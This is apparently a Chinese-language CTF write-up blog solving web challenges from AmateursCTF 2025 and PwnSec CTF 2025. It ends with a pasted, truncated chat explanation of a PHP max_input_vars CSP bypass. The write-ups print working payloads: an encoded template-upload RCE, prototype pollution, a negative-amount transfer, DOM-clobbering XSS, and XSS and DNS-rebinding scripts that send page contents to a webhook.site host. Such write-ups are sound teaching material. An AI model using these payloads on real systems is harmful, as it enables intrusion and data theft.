<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">"filename"</span>:<span class="string">"../views/flag3.ejs/."</span>,<span class="attr">"filedata"</span>:<span class="string">"ew0KICAiZmlsZW5hbWUiOiAic2hlbGwuZWpzIiwNCiAgImZpbGVkYXRhIjogIjwlPSBnbG9iYWwucHJvY2Vzcy5tYWluTW9kdWxlLnJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKS5leGVjU3luYygnY2F0IC9mbGFnJykudG9TdHJpbmcoKSAlPiINCn0="</span>&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://lh3.googleusercontent.com/d/1KD1GTWcsKWSMFbeyaG43OjqyB0CtKP3Z" alt></p>
<p>群里看到一种更有意思的解法</p>
<blockquote>
<p>upload pwned.pwned to /app/views/pwned.pwned: {“filename”:”../views/pwned.pwned”,”filedata”:”dGVzdAo=”}</p>
</blockquote>
<p>upload pwned to /app/node_modules/:</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">"filename"</span>:<span class="string">"../node_modules/pwned"</span>,<span class="attr">"filedata"</span>:<span class="string">"ZnVuY3Rpb24gX19leHByZXNzKCkgewogICAgY29uc29sZS5sb2coJ3B3bmVkYicpOwp9Cgptb2R1bGUuZXhwb3J0cyA9IHsgX19leHByZXNzIH07"</span>&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__express</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">'pwnedb'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = &#123; __express &#125;;</span><br></pre></td></tr></table></figure>

<h2 id="AmateursCTF-2025-web-desafe"><a href="#AmateursCTF-2025-web-desafe" class="headerlink" title="AmateursCTF 2025 web/desafe"></a>AmateursCTF 2025 web/desafe</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> &#123; serve &#125; <span class="keyword">from</span> <span class="string">'@hono/node-server'</span></span><br><span class="line"><span class="keyword">import</span> &#123; Hono &#125; <span class="keyword">from</span> <span class="string">'hono'</span></span><br><span class="line"><span class="keyword">import</span> &#123; readFileSync &#125; <span class="keyword">from</span> <span class="string">'fs'</span></span><br><span class="line"><span class="keyword">import</span> * <span class="keyword">as</span> devalue <span class="keyword">from</span> <span class="string">'devalue'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="keyword">new</span> Hono()</span><br><span class="line"><span class="keyword">const</span> FLAG = readFileSync(<span class="string">'flag.txt'</span>)</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FlagRequest</span> </span>&#123;</span><br><span class="line">  <span class="keyword">constructor</span>(feedback) &#123;</span><br><span class="line">    <span class="comment">// your feedback is greatly appreciated!</span></span><br><span class="line">    <span class="keyword">delete</span> &#123; feedback &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">get</span> flag() &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">this</span>.admin) &#123;</span><br><span class="line">      <span class="keyword">return</span> FLAG;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="string">"haha nope"</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">'/'</span>, (c) =&gt; &#123;</span><br><span class="line">  <span class="keyword">return</span> c.text(<span class="string">`POST /</span></span><br><span class="line"><span class="string">Body: FlagRequest(feedback), must be devalue stringified`</span>)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">'/'</span>, <span class="keyword">async</span> (c) =&gt; &#123;</span><br><span class="line">  <span class="keyword">const</span> body = <span class="keyword">await</span> c.req.text();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> flagRequest = devalue.parse(body, &#123;</span><br><span class="line">    FlagRequest: <span class="function">(<span class="params">[a]</span>) =&gt;</span> <span class="keyword">new</span> FlagRequest(a),</span><br><span class="line">  &#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!(flagRequest <span class="keyword">instanceof</span> FlagRequest)) <span class="keyword">return</span> c.text(<span class="string">'not a flag request'</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> c.text(flagRequest.flag)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">serve(&#123;</span><br><span class="line">  fetch: app.fetch,</span><br><span class="line">  port: <span class="number">3000</span></span><br><span class="line">&#125;, (info) =&gt; &#123;</span><br><span class="line">  <span class="built_in">console</span>.log(<span class="string">`Server is running on http://localhost:<span class="subst">$&#123;info.port&#125;</span>`</span>)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>CVE-2025-57820 <a href="https://github.com/advisories/GHSA-vj54-72f3-p5jv" target="_blank" rel="noopener">https://github.com/advisories/GHSA-vj54-72f3-p5jv</a></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[&#123;<span class="attr">"x"</span>:<span class="number">1</span>,<span class="attr">"y"</span>:<span class="number">2</span>,<span class="attr">"admin"</span>:<span class="number">3</span>,<span class="attr">"__proto__"</span>:<span class="number">4</span>&#125;,<span class="number">3</span>,<span class="number">4</span>,<span class="literal">true</span>,[<span class="string">"FlagRequest"</span>,<span class="number">5</span>],[<span class="number">6</span>,<span class="number">7</span>],<span class="number">8</span>,<span class="number">9</span>]</span><br></pre></td></tr></table></figure>

<p><img src="https://lh3.googleusercontent.com/d/1hl5Q1CVxMcj2pG2ytGSYjTz_6_Xkft8E" alt></p>
<h2 id="PwnSec-CTF-2025-A-Very-Safe-Locker-Indeed"><a href="#PwnSec-CTF-2025-A-Very-Safe-Locker-Indeed" class="headerlink" title="PwnSec CTF 2025 | A Very Safe Locker Indeed"></a>PwnSec CTF 2025 | A Very Safe Locker Indeed</h2><p>减去负数金额 就是加上</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> transaction_amount = <span class="built_in">parseFloat</span>(amount) * <span class="number">1.01</span> <span class="comment">// Include 1% fee</span></span><br><span class="line"><span class="keyword">if</span> (user_from.mainBalance &gt;= transaction_amount &amp;&amp; transaction_amount &gt; <span class="number">0</span>) &#123;</span><br><span class="line">  user_from.mainBalance -= transaction_amount</span><br><span class="line">  <span class="keyword">await</span> user_from.save()</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">  <span class="keyword">return</span> res.render(<span class="string">'index'</span>, &#123;</span><br><span class="line">    user: req.user,</span><br><span class="line">    balance: user_from.mainBalance,</span><br><span class="line">    failMessage: <span class="string">'Insufficient balance to cover the transfer and fees.'</span>,</span><br><span class="line">  &#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/transfer</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 1962bfce2e7d7acb.chal.ctf.ae</span><br><span class="line"><span class="attribute">Cookie</span>: session=s%3Aj%3A%7B%22userId%22%3A%226918ab0eeb20bf4d1b5e4628%22%2C%22firstName%22%3A%22test%22%2C%22lastName%22%3A%22test%22%2C%22phoneNumber%22%3A%222323232%22%2C%22email%22%3A%22a%40qq.com%22%7D.a5boElllkfAE6N3GSsk6aFbx5ombeTAdwjcE0lXxxFg</span><br><span class="line"><span class="attribute">Content-Length</span>: 65</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua</span>: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Mobile</span>: ?0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Platform</span>: "Windows"</span><br><span class="line"><span class="attribute">Origin</span>: https://1962bfce2e7d7acb.chal.ctf.ae</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span>: same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span>: navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span>: ?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span>: document</span><br><span class="line"><span class="attribute">Referer</span>: https://1962bfce2e7d7acb.chal.ctf.ae/</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate, br</span><br><span class="line"><span class="attribute">Accept-Language</span>: en,zh-CN;q=0.9,zh-HK;q=0.8,zh;q=0.7</span><br><span class="line"><span class="attribute">Priority</span>: u=0, i</span><br><span class="line"><span class="attribute">Connection</span>: keep-alive</span><br><span class="line"></span><br><span class="line">receiverInfo=6918ab0eeb20bf4d1b5e46281&amp;amount=-100000000000000000</span><br></pre></td></tr></table></figure>

<p>绕过csp，注意闭合</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/locker?<span class="attribute">userMessage</span>=\"&#125;`;alert(1);<span class="attribute">a</span>=``</span><br></pre></td></tr></table></figure>

<p><img src="https://lh3.googleusercontent.com/d/1YopmG6r9INKHmKJ6iD_EMiLhH_Yv3EYQ" alt></p>
<p>获取 /master/confedential 响应结果然后使用location重定向进行外发。</p>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\<span class="string">"&#125;`;fetch(`/master/confedential`).then(Function.prototype.call.bind(Response.prototype.text)).then(function(t)&#123;location.href=`https://webhook.site/8ca58cbe-0061-4107-a28b-d6e522e77be5?`+t&#125;);a=`</span></span><br></pre></td></tr></table></figure>

<p><img src="https://lh3.googleusercontent.com/d/1TgSelSPpFjnHfzwrcPZt0dRJifhJNKyW" alt></p>
<h2 id="PwnSec-CTF-2025-OhMyPP"><a href="#PwnSec-CTF-2025-OhMyPP" class="headerlink" title="PwnSec CTF 2025 | OhMyPP"></a>PwnSec CTF 2025 | OhMyPP</h2><p>原型链污染，把可执行路径换成上传的文件。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/report</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 1f4e39599ee9b212.chal.ctf.ae</span><br><span class="line"><span class="attribute">Content-Length</span>: 171</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Platform</span>: "Windows"</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Sec-Ch-Ua</span>: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"</span><br><span class="line"><span class="attribute">Content-Type</span>: application/json</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Mobile</span>: ?0</span><br><span class="line"><span class="attribute">Accept</span>: */*</span><br><span class="line"><span class="attribute">Origin</span>: https://1f4e39599ee9b212.chal.ctf.ae</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span>: same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span>: cors</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span>: empty</span><br><span class="line"><span class="attribute">Referer</span>: https://1f4e39599ee9b212.chal.ctf.ae/report</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate, br</span><br><span class="line"><span class="attribute">Accept-Language</span>: en,zh-CN;q=0.9,zh-HK;q=0.8,zh;q=0.7</span><br><span class="line"><span class="attribute">Priority</span>: u=1, i</span><br><span class="line"><span class="attribute">Connection</span>: keep-alive</span><br><span class="line"></span><br><span class="line">&#123;"username": "__proto__",</span><br><span class="line">        "issue": "executablePath",</span><br><span class="line">        "description": "/app/static/16976a3b3c7ae6b11cf3523983fa2bf2",</span><br><span class="line">        "url": "http://example.com"&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://lh3.googleusercontent.com/d/1Qbx0NKlBt7drVni9d2QEiidFOTb-4PEk" alt></p>
<h2 id="PwnSec-CTF-2025-FireLeak"><a href="#PwnSec-CTF-2025-FireLeak" class="headerlink" title="PwnSec CTF 2025 | FireLeak"></a>PwnSec CTF 2025 | FireLeak</h2><p>主要用了一个trick，让浏览器重新获取IP。初始ip直接拒收流量。<br>这里我用的python的base http，直接拒收服务。</p>
<p>踩了个大坑，webhook一直收不到，原来是触发了webhook的风控，直接把我给ban了。绝了，浪费时间。</p>
<p>DNS重绑定，用了这个服务：</p>
<ul>
<li><a href="http://dnsrebindtool.43z.one/" target="_blank" rel="noopener">http://dnsrebindtool.43z.one/</a></li>
<li><a href="https://lock.cmpxchg8b.com/rebinder.html" target="_blank" rel="noopener">https://lock.cmpxchg8b.com/rebinder.html</a></li>
</ul>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"viewport"</span> <span class="attr">content</span>=<span class="string">"width=device-width, initial-scale=1.0"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Payload<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="actionscript">        setTimeout(<span class="function"><span class="keyword">function</span><span class="params">()</span> </span>&#123;</span></span><br><span class="line">            </span><br><span class="line"><span class="actionscript">            <span class="keyword">var</span> firstErrorSent = <span class="literal">false</span>;</span></span><br><span class="line"><span class="actionscript">            <span class="keyword">var</span> interval_xhr = setInterval(<span class="function"><span class="keyword">function</span><span class="params">()</span> </span>&#123; </span></span><br><span class="line"><span class="actionscript">                <span class="keyword">var</span> xhr = <span class="keyword">new</span> XMLHttpRequest();</span></span><br><span class="line"><span class="actionscript">                xhr.open(<span class="string">'GET'</span>, <span class="string">'/flag'</span>, <span class="literal">false</span>); </span></span><br><span class="line">                </span><br><span class="line"><span class="actionscript">                <span class="keyword">try</span> &#123;</span></span><br><span class="line">                    xhr.send();</span><br><span class="line"><span class="actionscript">                &#125; <span class="keyword">catch</span> (error) &#123;</span></span><br><span class="line"><span class="actionscript">                    <span class="keyword">if</span> (!firstErrorSent) &#123;</span></span><br><span class="line"><span class="javascript">                        navigator.sendBeacon(<span class="string">'https://webhook.site/8ca58cbe-0061-4107-a28b-d6e522e77be5?catch_error='</span> + <span class="built_in">encodeURIComponent</span>(error.message));</span></span><br><span class="line"><span class="actionscript">                        firstErrorSent = <span class="literal">true</span>;</span></span><br><span class="line">                    &#125;</span><br><span class="line"><span class="actionscript">                    <span class="keyword">return</span>; </span></span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line"><span class="actionscript">                <span class="keyword">if</span> (xhr.status !== <span class="number">404</span> &amp;&amp; xhr.status !== <span class="number">0</span>) &#123;</span></span><br><span class="line">                    clearInterval(interval_xhr);</span><br><span class="line"><span class="actionscript">                    navigator.sendBeacon(<span class="string">'https://webhook.site/8ca58cbe-0061-4107-a28b-d6e522e77be5?status_xhr='</span> + xhr.status, xhr.responseText);</span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;, 500);</span><br><span class="line"></span><br><span class="line">        &#125;, 10);</span><br><span class="line">    <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="PwnSec-CTF-2025-PSPD"><a href="#PwnSec-CTF-2025-PSPD" class="headerlink" title="PwnSec CTF 2025 | PSPD"></a>PwnSec CTF 2025 | PSPD</h2><p>这个XSS的输出点，给了个非常迷惑性的玩意，让人觉得是用户名注入。</p>
<p>但其实浏览器js中，id名字可以直接js中使用。</p>
<p>所以，一个a标签，id名字取成userData。</p>
<p><code>&lt;a href=&quot;https://%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28%27YWxlcnQoMSk%3D%27%29%29%20%2F%3E@x.com&quot; id=&quot;userData&quot;&gt;&lt;/a&gt;</code></p>
<p>那么 userData.username 取的是href链接里的那部分……</p>
<p>也太trick了…..</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">userDataElement.insertAdjacentHTML(</span><br><span class="line"><span class="string">"beforeend"</span>,</span><br><span class="line"><span class="string">`&lt;p style='margin-top: 3rem;'&gt;Not agent &lt;b&gt;<span class="subst">$&#123;<span class="built_in">decodeURIComponent</span>(</span></span></span><br><span class="line"><span class="string"><span class="subst">    userData.username</span></span></span><br><span class="line"><span class="string"><span class="subst">)&#125;</span>&lt;/b&gt;? Report this incident to +111-337-1337&lt;/p&gt;`</span></span><br><span class="line">);</span><br><span class="line">&#125; <span class="keyword">catch</span> (err) &#123;</span><br><span class="line"><span class="built_in">console</span>.error(err);</span><br></pre></td></tr></table></figure>

<h2 id="PwnSec-CTF-2025-MaxPayne"><a href="#PwnSec-CTF-2025-MaxPayne" class="headerlink" title="PwnSec CTF 2025 | MaxPayne"></a>PwnSec CTF 2025 | MaxPayne</h2><p><a href="https://github.com/pallets/werkzeug/issues/2833" target="_blank" rel="noopener">https://github.com/pallets/werkzeug/issues/2833</a></p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line">根据搜索结果，您提供的链接指向的推文（来自 @pilvar222）讨论的是 PHP 中的一个特性（或更准确地说，是一个配置项）——max_input_vars。</span><br><span class="line"></span><br><span class="line">这个特性是 PHP 用来限制单个请求（如 GET, POST 或 COOKIE）中所能接受的输入变量的最大数量。</span><br><span class="line"></span><br><span class="line">详细解释：</span><br><span class="line">是什么 (What)？ max_input_vars 是在 php.ini 配置文件中的一个指令。它定义了 PHP 脚本在一次请求中可以处理的最大变量数量。</span><br><span class="line"></span><br><span class="line">为什么 (Why)？ 这个限制主要是出于安全考虑。如果不设限制，攻击者可能会发送一个包含海量变量的请求（例如，一个非常庞大的 POST 表单）。这可能会消耗服务器大量的资源（CPU 和内存）来解析这些变量，导致服务器性能下降甚至崩溃，这是一种潜在的拒绝服务（DoS）攻击。</span><br><span class="line"></span><br><span class="line">默认值 (Default Value)？ 在 PHP <span class="number">5.3</span><span class="number">.9</span> 及以后的版本中，这个值的默认设置通常是 <span class="number">1000</span>。</span><br><span class="line"></span><br><span class="line">如何工作 (How)？ 当一个 HTTP 请求（例如用户提交表单）到达服务器时，PHP 会开始解析请求中的数据（如 foo=bar&amp;baz=qux...）。</span><br><span class="line"></span><br><span class="line">如果请求中的变量数量小于或等于 max_input_vars 的限制（例如 <span class="number">1000</span>），所有变量都会被正常解析并填充到 <span class="symbol">$</span>_GET、<span class="symbol">$</span>_POST 或 <span class="symbol">$</span>_COOKIE 等超全局数组中。</span><br><span class="line"></span><br><span class="line">如果请求中的变量数量超过了这个限制（例如 <span class="number">1001</span> 个），PHP 会停止解析。它会接受前 <span class="number">1000</span> 个变量，而第 <span class="number">1001</span> 个及之后的所有变量都将被丢弃，并且 PHP 会产生一个 E_WARNING 级别的错误。</span><br><span class="line"></span><br><span class="line">潜在的安全风险（推文可能讨论的重点）：</span><br><span class="line">这个“截断”行为可能会引入严重的安全漏洞，尤其是当应用程序的逻辑依赖于那些“可能被截断”的变量时。</span><br><span class="line"></span><br><span class="line">举个例子： 假设一个应用有一个更新用户设置的表单，它发送了 <span class="number">1001</span> 个变量。最后一个变量（第 <span class="number">1001</span> 个）可能是一个关键的安全令牌（如 CSRF token）或者是一个“确认”按钮的值。</span><br><span class="line"></span><br><span class="line">POST Data:</span><br><span class="line">var_1=a</span><br><span class="line">var_2=b</span><br><span class="line">...</span><br><span class="line">var_999=y</span><br><span class="line">var_1000=z</span><br><span class="line">var_1001=security_token_value  &lt;-- 攻击者故意构造的第<span class="number">1001</span>个变量</span><br><span class="line">如果 max_input_vars 是 <span class="number">1000</span>：</span><br><span class="line"></span><br><span class="line">服务器只会接收到 var_1 到 var_1000。</span><br><span class="line"></span><br><span class="line">var_1001（即 security_token_value）会被丢弃。</span><br><span class="line"></span><br><span class="line">如果应用程序的 安全检查逻辑是 <span class="string">"IF security_token is present AND valid THEN..."</span>，由于 security_token 根本不存在于 <span class="symbol">$</span>_POST 数组中，这个检查可能会被意外绕过。</span><br><span class="line"></span><br><span class="line">Tenable 的一篇分析文章（在搜索结果中被引用）就提到了这一点，即这种变量截断可能被用来绕过某些安全检查或函数调用。推文作者（@pilvar222）很可能是在演示或讨论这种由 max_input_vars 限制导致的漏洞。</span><br><span class="line"></span><br><span class="line">总结：</span><br><span class="line">这个特性是 PHP 的一个内置安全机制，用于防止 DoS 攻击。然而，如果开发者不了解这个限制，或者攻击者恶意利用这个“截断”行为，它就可能反过来成为一个安全漏洞的入口。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">您问到了点子上了。您发的这个推文（以及它背后讨论的技术）确实是关于一个非常巧妙的 CSP 绕过技巧，而这个技巧的核心就是利用我上次提到的 max_input_vars。</span><br><span class="line"></span><br><span class="line">这（max_input_vars）本身不是 CSP 漏洞，但它的一个副作用可以被用来**“毒害”**服务器的响应，从而使 CSP 标头失效。</span><br><span class="line"></span><br><span class="line">绕过原理：”标头前置“规则</span><br><span class="line">这个绕过的核心原理，在于 PHP 的一个基础规则：</span><br><span class="line"></span><br><span class="line">header() 函数必须在任何实际输出（HTML、文本，甚至是一个空格）之前被调用。</span><br><span class="line"></span><br><span class="line">Content-Security-Policy (CSP) 是通过 HTTP 标头（Header）发送给浏览器的。在 PHP 中，这意味着开发者会使用 header(<span class="string">"Content-Security-Policy: ..."</span>) 这样的代码来设置它。</span><br><span class="line"></span><br><span class="line">如果 PHP 脚本在调用 header() 之前不小心输出了任何内容（哪怕是一个 Warning 警告信息），那么这个 header() 调用将静默失败，CSP 标头根本不会被发送。</span><br><span class="line"></span><br><span class="line">max_input_vars 的妙用（攻击链）</span><br><span class="line">@pilvar222 展示的技巧就是如何强制 PHP 在 header() 函数被调用之前产生输出。</span><br><span class="line"></span><br><span class="line">攻击者的目标： 网站上有一个 XSS 漏洞（例如 echo <span class="symbol">$</span>_GET[<span class="string">'xss'</span>];），但它被一个严格的 CSP 策略（如 default-src <span class="string">'self'</span>）所保护，导致脚本无法执行。</span><br><span class="line"></span><br><span class="line">max_input_vars 的副作用： 当 PHP 收到的输入变量（例如 GET 参数）数量超过了 php.ini 中设定的 max_input_vars 值（默认 <span class="number">1000</span>）时，PHP 不仅会截断变量，它还会在响应的最开头自动输出一个 Warning（警告）信息。</span><br><span class="line"></span><br><span class="line">例如：&lt;b&gt;Warning&lt;/b&gt;: Input <span class="keyword">variables</span> exceeded 